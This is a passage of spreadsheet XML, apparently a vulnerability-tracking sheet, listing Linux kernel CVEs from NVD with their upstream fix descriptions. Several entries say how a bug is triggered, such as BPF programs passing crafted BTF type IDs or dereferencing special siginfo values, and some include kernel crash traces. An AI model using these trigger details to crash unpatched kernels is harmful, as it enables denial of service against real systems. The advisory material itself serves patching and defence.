kernel_waitid_prepare() does likewise for waitid(P_ALL).
btf_ctx_access() currently types argument 0 as PTR_TO_BTF_ID |
PTR_TRUSTED. Without PTR_MAYBE_NULL, the verifier accepts an unchecked
dereference. Trusted pointer loads have no fault protection, so a wait for
any child can then cause a NULL pointer dereference in JITed BPF code.
Add sched_process_wait to raw_tp_null_args[] with argument 0 marked
nullable. The verifier rejects an unchecked dereference while preserving
access after the program checks the pointer for NULL.</t>
        </is>
      </c>
      <c r="T686" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-98059</t>
        </is>
      </c>
    </row>
    <row r="687">
      <c r="A687" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B687" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C687" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-98060</t>
        </is>
      </c>
      <c r="D687" s="5" t="inlineStr"/>
      <c r="E687" s="5" t="inlineStr"/>
      <c r="F687" s="5" t="inlineStr"/>
      <c r="G687" s="5" t="inlineStr"/>
      <c r="H687" s="5" t="inlineStr"/>
      <c r="I687" s="5" t="inlineStr"/>
      <c r="J687" s="5" t="inlineStr"/>
      <c r="K687" s="5" t="inlineStr"/>
      <c r="L687" s="5" t="inlineStr"/>
      <c r="M687" s="5" t="inlineStr"/>
      <c r="N687" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O687" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P687" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q687" s="5" t="inlineStr"/>
      <c r="R687" s="5" t="inlineStr"/>
      <c r="S687" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
bpf: Reject resilient lock operations in rbtree callbacks
__bpf_rbtree_add() keeps parent and link pointers live across calls to the
program-supplied comparison callback. The verifier therefore requires the
root's lock to remain held throughout the callback.
The helper path enforces this rule for bpf_spin_lock() and
bpf_spin_unlock(), but the resilient lock kfunc argument path does not.
Since resilient locks may protect BPF rbtree roots, a callback can release
the root lock and let another CPU remove and free the node referenced by
the in-progress tree walk. The walk then resumes using freed pointers.
Reject resilient lock kfuncs in an rbtree comparison callback, matching
the existing policy for the spin lock helpers. Resilient-lock-protected
trees remain valid when their comparison callbacks leave lock state alone.</t>
        </is>
      </c>
      <c r="T687" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-98060</t>
        </is>
      </c>
    </row>
    <row r="688">
      <c r="A688" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B688" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C688" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-98061</t>
        </is>
      </c>
      <c r="D688" s="5" t="inlineStr"/>
      <c r="E688" s="5" t="inlineStr"/>
      <c r="F688" s="5" t="inlineStr"/>
      <c r="G688" s="5" t="inlineStr"/>
      <c r="H688" s="5" t="inlineStr"/>
      <c r="I688" s="5" t="inlineStr"/>
      <c r="J688" s="5" t="inlineStr"/>
      <c r="K688" s="5" t="inlineStr"/>
      <c r="L688" s="5" t="inlineStr"/>
      <c r="M688" s="5" t="inlineStr"/>
      <c r="N688" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O688" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P688" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q688" s="5" t="inlineStr"/>
      <c r="R688" s="5" t="inlineStr"/>
      <c r="S688" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
bpf: Reject tail calls directly from callback frames
A tail call from a non-zero frame is modeled as a return from that frame.
The verifier makes R0 unknown and calls prepare_func_exit() for the taken
branch.
When the current frame is a synchronous callback, prepare_func_exit()
enforces the callback return-value contract and marks R0 precise. Since the
tail-call path synthesized R0 rather than deriving it from an instruction,
precision backtracking reaches the callback-calling instruction with R0
still requested and triggers the "callback unexpected regs" verifier bug.
A CAP_BPF task can therefore cause a WARN and an -EFAULT BPF_PROG_LOAD.
Tail calls reachable from callbacks are already rejected later by
check_max_stack_depth(). Reject a tail call made directly by a callback
before constructing the inconsistent return state, using the existing
diagnostic. Tail calls from ordinary subprograms keep their current
behavior.</t>
        </is>
      </c>
      <c r="T688" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-98061</t>
        </is>
      </c>
    </row>
    <row r="689">
      <c r="A689" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B689" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C689" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-98062</t>
        </is>
      </c>
      <c r="D689" s="5" t="inlineStr"/>
      <c r="E689" s="5" t="inlineStr"/>
      <c r="F689" s="5" t="inlineStr"/>
      <c r="G689" s="5" t="inlineStr"/>
      <c r="H689" s="5" t="inlineStr"/>
      <c r="I689" s="5" t="inlineStr"/>
      <c r="J689" s="5" t="inlineStr">
        <is>
          <t>gin, rust</t>
        </is>
      </c>
      <c r="K689" s="5" t="inlineStr"/>
      <c r="L689" s="5" t="inlineStr"/>
      <c r="M689" s="5" t="inlineStr"/>
      <c r="N689" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O689" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P689" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q689" s="5" t="inlineStr"/>
      <c r="R689" s="5" t="inlineStr"/>
      <c r="S689" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
bpf: Mark signal tracepoint siginfo arguments as scalar
The signal_generate and signal_deliver tracepoints declare their info
argument as a struct kernel_siginfo pointer. btf_ctx_access() therefore
treats it as a trusted pointer for tp_btf programs.
Signal delivery also uses SEND_SIG_NOINFO and SEND_SIG_PRIV as special
values for this argument. Those values are zero and one respectively,
and are not pointers. A tp_btf program can currently dereference either
value and fault the kernel. In particular, signal_generate can run from
timer interrupt context, turning the fault into a kernel panic.
Record both tracepoints in raw_tp_null_args[] and mark argument one as
a non-pointer. This preserves scalar access to the cookie while rejecting
direct and helper-mediated pointer use. Merely marking it nullable would
not suffice because SEND_SIG_PRIV is nonzero.</t>
        </is>
      </c>
      <c r="T689" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-98062</t>
        </is>
      </c>
    </row>
    <row r="690">
      <c r="A690" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B690" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C690" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-98063</t>
        </is>
      </c>
      <c r="D690" s="5" t="inlineStr"/>
      <c r="E690" s="5" t="inlineStr"/>
      <c r="F690" s="5" t="inlineStr"/>
      <c r="G690" s="5" t="inlineStr"/>
      <c r="H690" s="5" t="inlineStr"/>
      <c r="I690" s="5" t="inlineStr"/>
      <c r="J690" s="5" t="inlineStr"/>
      <c r="K690" s="5" t="inlineStr"/>
      <c r="L690" s="5" t="inlineStr"/>
      <c r="M690" s="5" t="inlineStr"/>
      <c r="N690" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O690" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P690" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q690" s="5" t="inlineStr"/>
      <c r="R690" s="5" t="inlineStr"/>
      <c r="S690" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
bpf: Fix NULL-ptr-deref in btf_var_show()
btf_var_show() calls btf_type_id_resolve() unconditionally, which
dereferences btf-&gt;resolved_ids. That is NULL for a base BTF - e.g. the
vmlinux BTF that bpf_snprintf_btf() renders against - since base BTF is
not resolved during parsing. btf_modifier_show() guards this with
'if (btf-&gt;resolved_ids)', but btf_var_show() does not.
A BPF program that passes the type_id of a BTF_KIND_VAR from the vmlinux
BTF to bpf_snprintf_btf() thus NULL-derefs:
KASAN: probably user-memory-access in range [0x46638-0x4663f]
RIP: 0010:btf_var_show (kernel/bpf/btf.c:2929)
Call Trace:
 &lt;TASK&gt;
 btf_type_show (kernel/bpf/btf.c:8259)
 btf_type_snprintf_show (kernel/bpf/btf.c:8329)
 bpf_snprintf_btf (kernel/trace/bpf_trace.c:1047)
 bpf_prog_test_run_raw_tp (net/bpf/test_run.c:829)
 __sys_bpf (kernel/bpf/syscall.c:4804)
 do_syscall_64 (arch/x86/entry/syscall_64.c:84)
 entry_SYSCALL_64_after_hwframe (arch/x86/entry/entry_64.S:121)
 &lt;/TASK&gt;
Resolve the var's type directly with btf_type_skip_modifiers() when
resolved_ids is NULL, mirroring btf_modifier_show().</t>
        </is>
      </c>
      <c r="T690" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-98063</t>
        </is>
      </c>
    </row>
    <row r="691">
      <c r="A691" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B691" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C691" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-98064</t>
        </is>
      </c>
      <c r="D691" s="5" t="inlineStr"/>
      <c r="E691" s="5" t="inlineStr"/>
      <c r="F691" s="5" t="inlineStr"/>
      <c r="G691" s="5" t="inlineStr"/>
      <c r="H691" s="5" t="inlineStr"/>
      <c r="I691" s="5" t="inlineStr"/>
      <c r="J691" s="5" t="inlineStr"/>
      <c r="K691" s="5" t="inlineStr"/>
      <c r="L691" s="5" t="inlineStr"/>
      <c r="M691" s="5" t="inlineStr"/>
      <c r="N691" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O691" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P691" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q691" s="5" t="inlineStr"/>
      <c r="R691" s="5" t="inlineStr"/>
      <c r="S691" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
bpf: Fix NULL-ptr-deref when showing a void BTF type
btf_modifier_show() resolves the modifier and then calls
btf_type_ops(t)-&gt;show() unconditionally. For the void type (type_id 0,
BTF_KIND_UNKN) kind_ops[] has no entry, so -&gt;show is NULL.
A "const void" (a modifier resolving to void) cannot be a map key or
value - map_check_btf() rejects it because void has no size - so the map
dump path does not reach it. But bpf_snprintf_btf() takes a type_id
straight from the BPF program, and passing such a "const void" from the
vmlinux BTF NULL-derefs:
KASAN: null-ptr-deref in range [0x0000000000000028-0x000000000000002f]
RIP: 0010:btf_modifier_show (kernel/bpf/btf.c:2914)
Call Trace:
 &lt;TASK&gt;
 btf_type_show (kernel/bpf/btf.c:8251)
 btf_type_snprintf_show (kernel/bpf/btf.c:8321)
 bpf_snprintf_btf (kernel/trace/bpf_trace.c:1047)
 bpf_prog_test_run_raw_tp (net/bpf/test_run.c:829)
 __sys_bpf (kernel/bpf/syscall.c:4804)
 do_syscall_64 (arch/x86/entry/syscall_64.c:94)
 entry_SYSCALL_64_after_hwframe (arch/x86/entry/entry_64.S:121)
 &lt;/TASK&gt;
Fall back to btf_df_show() when the resolved type has no show op; it
emits the "&lt;unsupported kind:N&gt;" placeholder already used for kinds like
FWD and FUNC. bpf_snprintf_btf() then returns the length as usual.</t>
        </is>
      </c>
      <c r="T691" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-98064</t>
        </is>
      </c>
    </row>
    <row r="692">
      <c r="A692" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B692" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C692" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-98065</t>
        </is>
      </c>
      <c r="D692" s="5" t="inlineStr"/>
      <c r="E692" s="5" t="inlineStr"/>
      <c r="F692" s="5" t="inlineStr"/>
      <c r="G692" s="5" t="inlineStr"/>
      <c r="H692" s="5" t="inlineStr"/>
      <c r="I692" s="5" t="inlineStr"/>
      <c r="J692" s="5" t="inlineStr">
        <is>
          <t>f5</t>
        </is>
      </c>
      <c r="K692" s="5" t="inlineStr"/>
      <c r="L692" s="5" t="inlineStr"/>
      <c r="M692" s="5" t="inlineStr"/>
      <c r="N692" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O692" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P692" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q692" s="5" t="inlineStr"/>
      <c r="R692" s="5" t="inlineStr"/>
      <c r="S692" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
bpf: Reject key-less BTF for hash maps
map_check_btf() allows a key-less BTF (btf_key_type_id == 0) only for
maps that have a -&gt;map_check_btf callback, and leaves the actual
decision to that callback. Hash maps used to have no -&gt;map_check_btf,
so a key-less BTF was rejected outright.
That changed when htab and rhtab gained a -&gt;map_check_btf to register a
dtor - htab in commit 1df97a7453ee ("bpf: Register dtor for freeing
special fields") and rhtab in commit 6905f8601298 ("bpf: Allow special
fields in resizable hashtab"). Neither looks at the key, so a key-less
hash map now passes map_check_btf() and gets created. Reading it back
through bpffs feeds the key type_id 0 into btf_type_seq_show();
btf_type_by_id() returns the void type, kind_ops[BTF_KIND_UNKN] is NULL,
and btf_type_show() dereferences it:
RIP: 0010:btf_type_show+0x223/0x2e0 kernel/bpf/btf.c:8232
RSP: 0018:ffffc9000399f868 EFLAGS: 00010206
RAX: dffffc0000000000 RBX: 0000000000000000 RCX: 0000000000000000
RDX: 0000000000000005 RSI: 0000000000000000 RDI: 0000000000000028
RBP: 0000000000000000 R08: 0000000000000001 R09: 0000000000000000
R10: ffffc9000399f970 R11: 0000000000000001 R12: ffffffff9b96b140
R13: ffffc9000399f8e0 R14: ffff88803d393c00 R15: 0000000000000003
CS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033
CR2: 0000200000000000 CR3: 000000003d213000 CR4: 0000000000352ef0
DR0: 0000000039ae8f55 DR1: 0000000000000000 DR2: 0000000000000000
DR3: 0000000000000000 DR6: 00000000ffff0ff0 DR7: 0000000000000400
Call Trace:
 &lt;TASK&gt;
 btf_type_seq_show_flags+0xca/0x120 kernel/bpf/btf.c:8250
 htab_map_seq_show_elem+0x12e/0x350 kernel/bpf/hashtab.c:1669
 map_seq_show+0x13d/0x1e0 kernel/bpf/inode.c:293
 traverse.part.0.constprop.0+0x107/0x650 fs/seq_file.c:112
 traverse fs/seq_file.c:99 [inline]
 seq_read_iter+0x93f/0x1270 fs/seq_file.c:196
 seq_read+0x344/0x4d0 fs/seq_file.c:163
 vfs_read+0x1e4/0xb40 fs/read_write.c:572
 ksys_pread64 fs/read_write.c:764 [inline]
 __do_sys_pread64 fs/read_write.c:772 [inline]
 __se_sys_pread64 fs/read_write.c:769 [inline]
 __x64_sys_pread64+0x1eb/0x250 fs/read_write.c:769
 do_syscall_x64 arch/x86/entry/syscall_64.c:61 [inline]
 do_syscall_64+0x123/0x790 arch/x86/entry/syscall_64.c:84
 entry_SYSCALL_64_after_hwframe+0x77/0x7f
Reject a key-less BTF in htab_map_check_btf() and rhtab_map_check_btf(),
restoring the previous behavior.</t>
        </is>
      </c>
      <c r="T692" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-98065</t>
        </is>
      </c>
    </row>
    <row r="693">
      <c r="A693" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B693" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C693" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-98066</t>
        </is>
      </c>
      <c r="D693" s="5" t="inlineStr"/>
      <c r="E693" s="5" t="inlineStr"/>
      <c r="F693" s="5" t="inlineStr"/>
      <c r="G693" s="5" t="inlineStr"/>
      <c r="H693" s="5" t="inlineStr"/>
      <c r="I693" s="5" t="inlineStr"/>
      <c r="J693" s="5" t="inlineStr"/>
      <c r="K693" s="5" t="inlineStr"/>
      <c r="L693" s="5" t="inlineStr"/>
      <c r="M693" s="5" t="inlineStr"/>
      <c r="N693" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O693" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P693" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q693" s="5" t="inlineStr"/>
      <c r="R693" s="5" t="inlineStr"/>
      <c r="S693" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
ALSA: caiaq: Fix potential double-free at error path
The fix for caiaq driver's resource management to handle the errors
tries to release the resources in a common destructor call, but as a
sashiko review for another patch suggested, some of the audio
resources such as URBs have been already freed, and this may lead to a
double-free.
For addressing the double-free, call the common destructor function
from each place, and assure that the resource pointers get cleared.</t>
        </is>
      </c>
      <c r="T693" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-98066</t>
        </is>
      </c>
    </row>
    <row r="694">
      <c r="A694" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B694" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C694" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-98067</t>
        </is>
      </c>
      <c r="D694" s="5" t="inlineStr"/>
      <c r="E694" s="5" t="inlineStr"/>
      <c r="F694" s="5" t="inlineStr"/>
      <c r="G694" s="5" t="inlineStr"/>
      <c r="H694" s="5" t="inlineStr"/>
      <c r="I694" s="5" t="inlineStr"/>
      <c r="J694" s="5" t="inlineStr">
        <is>
          <t>tempo, go</t>
        </is>
      </c>
      <c r="K694" s="5" t="inlineStr"/>
      <c r="L694" s="5" t="inlineStr"/>
      <c r="M694" s="5" t="inlineStr"/>
      <c r="N694" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O694" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P694" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q694" s="5" t="inlineStr"/>
      <c r="R694" s="5" t="inlineStr"/>
      <c r="S694" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
erofs: disable LZ4 rolling decompression for now
LZ4 rolling decompression [1] was introduced to reduce the memory
footprint of temporary pages:
 For many cases, it is needed for users to read small data within
 a compressed extent (pcluster), either due to random small read, or
 since uptodate folios (typically order-0) cannot be reused for
 decompression again since decompression algorithm refills
 already-uptodate folios.
Rolling decompression works because LZ4 is LZ77-based and only refers
to the most recent 64 KiB of decompressed data, so in theory only a
bounded rolling window of temporary pages is needed when decompressing.
It can save a lot of temporary memory, e.g.
 601,960-byte data can be compressed into a 256k LZ4 compressed extent,
 which means it needs 146 extra pages per request in the worst case if
 rolling decompression is disabled.
However, the upstream LZ4 implementation is not under EROFS' control:
For example, the literal copy memmove() may still **copy long literals
backward** on x86 based on the address comparison even when the source
and destination ranges do not overlap (IOWs, inline decompression
doesn't need to be considered here). That breaks the rolling assumption
and makes the optimization broken.
Disable it for now to make sure the data correctness first since EROFS
is used everywhere now: The rolling window approach can be revived once
we either ensure that the official LZ4 code always copies forward for
non-overlapping ranges or maintain our own LZ4 implementation in EROFS.
The main impact is a higher runtime memory footprint; However, recent
commit 0f6273ab4637 ("erofs: add a reserved buffer pool for lz4
decompression") helps mitigate this when enabled but it's still not
perfect.
[1] https://www.usenix.org/conference/atc19/presentation/gao
    § 3.3 Decompression</t>
        </is>
      </c>
      <c r="T694" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-98067</t>
        </is>
      </c>
    </row>
    <row r="695">
      <c r="A695" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B695" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C695" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-98068</t>
        </is>
      </c>
      <c r="D695" s="5" t="inlineStr"/>
      <c r="E695" s="5" t="inlineStr"/>
      <c r="F695" s="5" t="inlineStr"/>
      <c r="G695" s="5" t="inlineStr"/>
      <c r="H695" s="5" t="inlineStr"/>
      <c r="I695" s="5" t="inlineStr"/>
      <c r="J695" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K695" s="5" t="inlineStr"/>
      <c r="L695" s="5" t="inlineStr"/>
      <c r="M695" s="5" t="inlineStr"/>
      <c r="N695" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O695" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P695" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q695" s="5" t="inlineStr"/>
      <c r="R695" s="5" t="inlineStr"/>
      <c r="S695" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
net/rds: don't let rds_conn_shutdown() consume a concurrent drop
rds_conn_shutdown() finishes by moving the path from
RDS_CONN_DISCONNECTING to RDS_CONN_DOWN, and also accepts
RDS_CONN_ERROR as the starting state of that final transition, so that
a FIN processed in softirq context during the teardown does not derail
the shutdown into a noisy error path.
But consuming that RDS_CONN_ERROR also consumes the shutdown pass that
came with it: rds_conn_path_drop() sets RDS_CONN_ERROR and then queues
cp_down_w, and a pass that starts on a path already in RDS_CONN_DOWN
is a no-op.  For the FIN case that is harmless - the socket the FIN
arrived on is the very socket the teardown just released.  It is not
harmless for a dropper that attached something to the path first.
rds_tcp_accept_one() is such a dropper.  Its path claim in
rds_tcp_accept_one_path() transitions RDS_CONN_DOWN -&gt;
RDS_CONN_CONNECTING, and a concurrent drop - a FIN on a previous
socket in softirq context, an administrative reset - can put the path
into RDS_CONN_ERROR between that claim and the state check that
follows, which accepts RDS_CONN_ERROR.  The accept then installs the
freshly accepted socket with rds_tcp_set_callbacks() while the queued
teardown - which sampled tc-&gt;t_sock before this socket existed - is
still running.  rds_connect_path_complete() fails its transition to
RDS_CONN_UP and drops the path again, queueing the pass that should
reap the socket it just installed.  If the in-flight shutdown's final
transition consumes that drop's RDS_CONN_ERROR, the queued pass finds
the path in RDS_CONN_DOWN and does nothing.  The installed socket is
never torn down: it sits established with its callbacks armed and its
rds_tcp_connection on rds_tcp_tc_list, the peer sees a connection that
nothing ever reads, and the path is wedged in RDS_CONN_DOWN until some
later event drops it again.  Reproduced with widened race windows as
an ever-growing receive queue on a socket owned by a path stuck in
RDS_CONN_DOWN, with the peer's send path wedged behind it.
Make the final transition only DISCONNECTING -&gt; DOWN.  If it fails
because the path is in RDS_CONN_ERROR, a drop raced the teardown:
cancel the reconnect timer and clear RDS_RECONNECT_PENDING - the one
piece of the skipped tail that must not be left behind - and return,
letting the pass the drop queued finish the job: it tears down
whatever attached to the path in the meantime, completes the
transition to RDS_CONN_DOWN, and re-arms the reconnect from its own
tail.
The timer quiesce in that branch matters because the racing drop does
not always queue that pass: rds_conn_path_drop() returns without
queueing when a destroy is pending - exactly the situation during a
netns teardown or module unload, when a FIN on the dying socket is
processed while rds_conn_path_destroy() flushes cp_down_w.  If the
flushed pass is the one that takes this return, no later pass exists,
and rds_conn_path_destroy() would find cp_conn_w still armed
(WARN_ON) and then free a path whose reconnect timer can still fire.
With the cancel in the branch, every exit of a shutdown pass leaves
the timer quiesced no matter which pass completes the transition.
The FIN case keeps making progress, one pass later and still without
noisy logging.  Any other state keeps today's rds_conn_path_error()
handling; no current cp_state writer can leave a DISCONNECTING path
in anything but RDS_CONN_ERROR (every other writer is a cmpxchg from
a non-DISCONNECTING state), so that branch is defensive.
On kernels without the preceding patches the same hazard exists with
the sample-based quiesce; the fix applies there equally.</t>
        </is>
      </c>
      <c r="T695" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-98068</t>
        </is>
      </c>
    </row>
    <row r="696">
      <c r="A696" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B696" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C696" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-98071</t>
        </is>
      </c>
      <c r="D696" s="5" t="inlineStr"/>
      <c r="E696" s="5" t="inlineStr"/>
      <c r="F696" s="5" t="inlineStr"/>
      <c r="G696" s="5" t="inlineStr"/>
      <c r="H696" s="5" t="inlineStr"/>
      <c r="I696" s="5" t="inlineStr"/>
      <c r="J696" s="5" t="inlineStr">
        <is>
          <t>oracle</t>
        </is>
      </c>
      <c r="K696" s="5" t="inlineStr"/>
      <c r="L696" s="5" t="inlineStr"/>
      <c r="M696" s="5" t="inlineStr"/>
      <c r="N696" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O696" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P696" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q696" s="5" t="inlineStr"/>
      <c r="R696" s="5" t="inlineStr"/>
      <c r="S696" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
net/rds: clear cp_flags bits individually in rds_conn_path_reset()
rds_conn_path_reset() wipes the whole flag word with a plain
cp-&gt;cp_flags = 0 store.  Every other accessor of that word uses
atomic bitops, and some of them can run concurrently with the reset:
RDS_LL_SEND_FULL is set from rds_send_xmit() and cleared from the
transport completion paths, neither of which holds anything that
excludes the shutdown worker.  A plain store racing an atomic
read-modify-write on the same word is a data race, and whichever
side loses has its update silently discarded.
Clear the two bits the reset is actually responsible for instead.
RDS_IN_XMIT and RDS_RECV_REFILL need no store at all here: they
belong to the caller, rds_conn_shutdown(), which waits for both to be
clear before calling the transport shutdown and this reset.
This also gives every bit in cp_flags a single well-defined writer
discipline, which the following patches rely on when they turn
RDS_IN_XMIT and RDS_RECV_REFILL into bit locks held across the
teardown: a blanket store mid-teardown would destroy lock ownership
that an atomic clear preserves.
Oracle UEK carries the same conversion ("net/rds: Preserve essential
connection state flags"), motivated by its asynchronous shutdown
state machine, whose progress and destroy flags must survive the
reset.  UEK's variant also clears RDS_IN_XMIT and RDS_RECV_REFILL
because there the reset runs as the final step of a teardown that
owns both bits, making those clears its unlock.  Upstream that
release belongs in rds_conn_shutdown(): once a later patch in this
series turns the two bits into locks held across the teardown, ending
ownership needs release semantics and a wake-up that a plain clear
inside the reset would not provide.
Based on Oracle UEK commit "net/rds: Preserve essential connection
state flags" by Gerd Rausch.</t>
        </is>
      </c>
      <c r="T696" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-98071</t>
        </is>
      </c>
    </row>
    <row r="697">
      <c r="A697" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B697" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C697" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-98072</t>
        </is>
      </c>
      <c r="D697" s="5" t="inlineStr"/>
      <c r="E697" s="5" t="inlineStr"/>
      <c r="F697" s="5" t="inlineStr"/>
      <c r="G697" s="5" t="inlineStr"/>
      <c r="H697" s="5" t="inlineStr"/>
      <c r="I697" s="5" t="inlineStr"/>
      <c r="J697" s="5" t="inlineStr"/>
      <c r="K697" s="5" t="inlineStr"/>
      <c r="L697" s="5" t="inlineStr"/>
      <c r="M697" s="5" t="inlineStr"/>
      <c r="N697" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O697" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P697" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q697" s="5" t="inlineStr"/>
      <c r="R697" s="5" t="inlineStr"/>
      <c r="S697" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
net/rds: use wq_has_sleeper() in release_in_xmit()
release_in_xmit() clears RDS_IN_XMIT with clear_bit_unlock() and then
checks waitqueue_active() to decide whether anyone needs waking.
clear_bit_unlock() is only a release operation: it orders the
critical section before the bit clear, but does not order the
subsequent plain load of the wait queue head after it.  The waiter
side does the mirror image - it adds itself to the wait queue and
then tests the bit.  That is the classic store-buffering pattern: the
releasing CPU can read the wait queue as empty while the waiting CPU
still reads the bit as set, so the sleeper is never woken.
The waiters are rds_conn_shutdown() and rds_tcp_reset_callbacks(),
